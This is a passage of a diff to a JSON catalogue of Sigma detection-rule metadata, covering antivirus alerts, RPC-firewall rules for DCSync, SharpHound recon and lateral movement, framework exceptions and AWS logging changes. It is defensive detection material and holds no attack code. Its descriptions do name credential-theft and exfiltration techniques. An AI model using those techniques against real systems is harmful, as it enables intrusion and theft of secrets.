"6fe1719e-ecdf-4caf-bffe-4f501cb0a561", - "value": "Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports ransomware", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/12", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_ransomware.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - 
"https://www.nextron-systems.com/?s=antivirus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_ransomware.yml" - ], - "tags": [ - "attack.t1486" - ] - }, - "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", - "value": "Antivirus Ransomware Detection" - }, - { - "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name", - "meta": { - "author": "Florian Roth, Arnim Rupp", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_relevant_files.yml", - "level": "high", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_relevant_files.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588" - ] - }, - "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c", - "value": "Antivirus Relevant File Paths Alerts" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. 
github and checking the matches.", - "meta": { - "author": "Florian Roth, Arnim Rupp", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_webshell.yml", - "level": "high", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", - "https://github.com/tennc/webshell", - "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", - "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", - "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", - "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", - "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", - "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", - "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_webshell.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "fdf135a2-9241-4f96-a114-bb404948f736", - "value": "Antivirus Web Shell Detection" - }, - { - "description": "Detects suspicious Django web application framework exceptions that could indicate exploitation attempts", + "description": "Detects many failed connection attempts to different ports or hosts", "meta": { "author": "Thomas Patzke", - "creation_date": "2017/08/05", + "creation_date": "2017/02/19", "falsepositive": [ - "Application bugs" + "Inventarization systems", + "Vulnerability scans" ], - "filename": "appframework_django_exceptions.yml", + "filename": 
"net_firewall_susp_network_scan_by_port.yml", "level": "medium", - "logsource.category": "application", - "logsource.product": "django", - "refs": [ - "https://docs.djangoproject.com/en/1.11/ref/exceptions/", - "https://docs.djangoproject.com/en/1.11/topics/logging/#django-security", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "fd435618-981e-4a7c-81f8-f78ce480d616", - "value": "Django Framework Exceptions" - }, - { - "description": "Generic rule for SQL exceptions in Python according to PEP 249", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/08/12", - "falsepositive": [ - "Application bugs" - ], - "filename": "app_python_sql_exceptions.yml", - "level": "medium", - "logsource.category": "application", - "logsource.product": "python", - "refs": [ - "https://www.python.org/dev/peps/pep-0249/#exceptions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/python/app_python_sql_exceptions.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", - "value": "Python SQL Exceptions" - }, - { - "description": "Detects remote RPC calls to create or execute a scheduled task via ATSvc", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_atsvc_lateral_movement.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/techniques/T1053/", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", 
- "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1053", - "attack.t1053.002" - ] - }, - "uuid": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", - "value": "Remote Schedule Task Lateral Movement via ATSvc" - }, - { - "description": "Detects remote RPC calls to read information about scheduled tasks via AtScv", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_atsvc_recon.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/zeronetworks/rpcfirewall", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" - ], - "tags": "No established tags" - }, - "uuid": "f177f2bc-5f3e-4453-b599-57eefce9a59c", - "value": "Remote Schedule Task Recon via AtScv" - }, - { - "description": "Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_dcsync_attack.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/techniques/T1033/", - 
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" - ], - "tags": [ - "attack.t1033" - ] - }, - "uuid": "56fda488-113e-4ce9-8076-afc2457922c3", - "value": "Possible DCSync Attack" - }, - { - "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Legitimate usage of remote file encryption" - ], - "filename": "rpc_firewall_efs_abuse.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" - ], - "tags": [ - "attack.lateral_movement" - ] - }, - "uuid": "5f92fff9-82e2-48eb-8fc1-8b133556a551", - "value": "Remote Encrypting File System Abuse" - }, - { - "description": "Detects remote RPC calls to get event log information via EVEN or EVEN6", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Remote administrative tasks on Windows Events" - ], - "filename": "rpc_firewall_eventlog_recon.yml", - "level": "high", 
- "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" - ], - "tags": "No established tags" - }, - "uuid": "2053961f-44c7-4a64-b62d-f6e72800af0d", - "value": "Remote Event Log Recon" - }, - { - "description": "Detects remote RPC calls to create or execute a scheduled task", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_itaskschedulerservice_lateral_movement.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/techniques/T1053/", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1053", - "attack.t1053.002" - ] - }, - "uuid": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", - "value": "Remote Schedule Task Lateral Movement via ITaskSchedulerService" - }, - { - "description": "Detects remote RPC calls to read information about scheduled tasks", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_itaskschedulerservice_recon.yml", - 
"level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" - ], - "tags": "No established tags" - }, - "uuid": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", - "value": "Remote Schedule Task Recon via ITaskSchedulerService" - }, - { - "description": "Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Actual printing" - ], - "filename": "rpc_firewall_printing_lateral_movement.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement" - ] - }, - "uuid": 
"bc3a4b0c-e167-48e1-aa88-b3020950e560", - "value": "Remote Printing Abuse for Lateral Movement" - }, - { - "description": "Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Some administrative tasks on remote host" - ], - "filename": "rpc_firewall_remote_dcom_or_wmi.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://attack.mitre.org/techniques/T1021/003/", - "https://attack.mitre.org/techniques/T1047/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.003", - "attack.t1047" - ] - }, - "uuid": "68050b10-e477-4377-a99b-3721b422d6ef", - "value": "Remote DCOM/WMI Lateral Movement" - }, - { - "description": "Detects remote RPC calls to modify the registry and possible execute code", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Remote administration of registry values" - ], - "filename": "rpc_firewall_remote_registry_lateral_movement.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/techniques/T1112/", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - 
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement" - ] - }, - "uuid": "35c55673-84ca-4e99-8d09-e334f3c29539", - "value": "Remote Registry Lateral Movement" - }, - { - "description": "Detects remote RPC calls to collect information", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Remote administration of registry values" - ], - "filename": "rpc_firewall_remote_registry_recon.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" - ], - "tags": "No established tags" - }, - "uuid": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", - "value": "Remote Registry Recon" - }, - { - "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Legitimate remote share creation" - ], - "filename": "rpc_firewall_remote_server_service_abuse.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - 
"refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" - ], - "tags": [ - "attack.lateral_movement" - ] - }, - "uuid": "b6ea3cc7-542f-43ef-bbe4-980fbed444c7", - "value": "Remote Server Service Abuse" - }, - { - "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Administrative tasks on remote services" - ], - "filename": "rpc_firewall_remote_service_lateral_movement.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://attack.mitre.org/techniques/T1569/002/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1569.002" - ] - }, - "uuid": "10018e73-06ec-46ec-8107-9172f1e04ff2", - "value": "Remote Server Service Abuse for Lateral Movement" - }, - { - "description": "Detects remote RPC calls to create or execute a scheduled task via 
SASec", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_sasec_lateral_movement.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/techniques/T1053/", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1053", - "attack.t1053.002" - ] - }, - "uuid": "aff229ab-f8cd-447b-b215-084d11e79eb0", - "value": "Remote Schedule Task Lateral Movement via SASec" - }, - { - "description": "Detects remote RPC calls to read information about scheduled tasks via SASec", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_sasec_recon.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" - ], - "tags": "No 
established tags" - }, - "uuid": "0a3ff354-93fc-4273-8a03-1078782de5b7", - "value": "Recon Activity via SASec" - }, - { - "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_sharphound_recon_account.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/techniques/T1087/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" - ], - "tags": [ - "attack.t1087" - ] - }, - "uuid": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5", - "value": "SharpHound Recon Account Discovery" - }, - { - "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_sharphound_recon_sessions.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/techniques/T1033/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", - "https://github.com/zeronetworks/rpcfirewall", - 
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" - ], - "tags": [ - "attack.t1033" - ] - }, - "uuid": "6d580420-ff3f-4e0e-b6b0-41b90c787e28", - "value": "SharpHound Recon Sessions" - }, - { - "description": "Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/08/06", - "falsepositive": [ - "Application bugs" - ], - "filename": "appframework_ruby_on_rails_exceptions.yml", - "level": "medium", - "logsource.category": "application", - "logsource.product": "ruby_on_rails", - "refs": [ - "http://edgeguides.rubyonrails.org/security.html", - "http://guides.rubyonrails.org/action_controller_overview.html", - "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", - "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", - "value": "Ruby on Rails Framework Exceptions" - }, - { - "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/08/06", - "falsepositive": [ - "Application bugs" - ], - "filename": "appframework_spring_exceptions.yml", - "level": "medium", - "logsource.category": "application", - "logsource.product": "spring", - "refs": [ - "https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/appframework_spring_exceptions.yml" - ], - "tags": [ 
- "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33", - "value": "Spring Framework Exceptions" - }, - { - "description": "Detects SQL error messages that indicate probing for an injection attack", - "meta": { - "author": "Bjoern Kimminich", - "creation_date": "2017/11/27", - "falsepositive": [ - "Application bugs" - ], - "filename": "app_sqlinjection_errors.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "sql", - "refs": [ - "http://www.sqlinjection.net/errors", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/sql/app_sqlinjection_errors.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "8a670c6d-7189-4b1c-8017-a417ca84a086", - "value": "Suspicious SQL Error Messages" - }, - { - "description": "Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls.\nThis would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.\n", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/09/23", - "falsepositive": [ - "Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "aws_attached_malicious_lambda_layer.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d", - "value": "AWS Attached Malicious Lambda Layer" - }, - { - "description": "Detects disabling, deleting and updating of a Trail", - "meta": { - "author": "vitaliy0x1", - "creation_date": "2020/01/21", - "falsepositive": [ - "Valid change in a Trail" - ], - "filename": "aws_cloudtrail_disable_logging.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_cloudtrail_disable_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "4db60cc0-36fb-42b7-9b58-a5b53019fb74", - "value": "AWS CloudTrail Important Change" - }, - { - "description": "Detects AWS Config Service disabling", - "meta": { - "author": "vitaliy0x1", - "creation_date": "2020/01/21", - "falsepositive": [ - "Valid change in AWS Config Service" - ], - "filename": "aws_config_disable_recording.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_config_disable_recording.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "07330162-dba1-4746-8121-a9647d49d297", - "value": "AWS Config Disabling Channel/Recorder" - }, - { - "description": "Identifies disabling of default Amazon Elastic Block Store (EBS) 
encryption in the current region.\nDisabling default encryption does not change the encryption status of your existing volumes.\n", - "meta": { - "author": "Sittikorn S", - "creation_date": "2021/06/29", - "falsepositive": [ - "System Administrator Activities", - "DEV, UAT, SAT environment. You should apply this rule with PROD account only." - ], - "filename": "aws_ec2_disable_encryption.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_disable_encryption.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486", - "attack.t1565" - ] - }, - "uuid": "16124c2d-e40b-4fcc-8f2c-5ab7870a2223", - "value": "AWS EC2 Disable EBS Encryption" - }, - { - "description": "Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.", - "meta": { - "author": "faloker", - "creation_date": "2020/02/11", - "falsepositive": [ - "Assets management software like device42" - ], - "filename": "aws_ec2_download_userdata.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_download_userdata.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ] - }, - "uuid": "26ff4080-194e-47e7-9889-ef7602efed0c", - "value": "AWS EC2 Download Userdata" - }, - { - "description": "Detects changes to the EC2 instance startup script. 
